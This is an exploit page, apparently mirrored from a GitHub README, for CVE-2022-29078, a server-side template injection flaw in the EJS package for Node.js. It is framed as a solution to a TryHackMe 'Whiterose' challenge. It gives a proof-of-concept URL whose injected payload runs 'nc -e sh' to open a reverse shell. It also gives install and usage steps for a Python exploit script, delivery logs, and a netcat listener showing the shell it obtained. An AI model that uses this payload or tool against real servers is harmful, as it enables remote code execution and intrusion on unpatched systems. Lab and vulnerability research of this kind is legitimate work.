Share
## https://sploitus.com/exploit?id=16D622A6-C7F9-52EC-8534-68952EEC5FBB
<h1 align="center">
  THM Challenge: SSTI RCE  
</h2>

<p align="center">
    <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2022-29078&label=Visitors&countColor=%2337d67a" />
    </a>
    <a href="https://www.facebook.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
    </a>
      <a href="https://www.twitter.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
    </a>
    <a href="https://medium.com/@l0n3m4n">
        <img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
    </a>
    <a href="https://www.python.org/">
    <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
    </a>
    <a href="https://www.kali.org/">
    <img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">      
    </a>
</p>

<h1 align="center">
    <img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
</h1>


## ๐Ÿ“œ Description 
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

## ๐Ÿ“š Table of Contents
- ๐Ÿ“œ [Description](#-description)
- ๐Ÿ› ๏ธ [Installation](#-installation)
- ๐Ÿ’ [References](#-references)

## POC
```bash
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
```

## ๐Ÿ› ๏ธ Installation and Usage
```bash
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git
$ python3 -m venv venv && source venv/bin/activate && cd CVE-2022-29078
$ pip install colorama==0.4.6 && pip install requests==2.26.0 
```
![burpsuite](burpsuite.png)
```bash
$ python3 CVE-2022-29078.py -h

  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose


usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD

Send a crafted POST request with custom URL, username, and password.

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target URL (e.g., http://admin.cyprusbank.thm/settings)
  -u USER, --user USER  Username to send in the request
  -p PASSWORD, --password PASSWORD
                        Password to send in the request

Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd 
```

## Output
```bash
  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose

[!] The exploit will automatically exit once we received a 504 from the server
```
## Log
```bash
$ cat exploit-ssti.log
2024-11-06 11:22:28,919 - INFO - Payload delivered successfully.
2024-11-06 11:32:47,806 - INFO - Payload delivered successfully.
2024-11-06 11:32:58,284 - INFO - Payload delivered successfully.
2024-11-06 11:37:13,616 - INFO - Payload delivered successfully.
2024-11-06 11:55:16,861 - WARNING - Connection failed with status code: 504
2024-11-06 11:59:27,820 - WARNING - Connection failed with status code: 504
```
## Netcat listener
```bash
$ sudo rlwrap -cAr nc -lvnp 443                                   
[sudo] password for l0n3m4n: 
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$ 
```

## ๐Ÿ’ References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001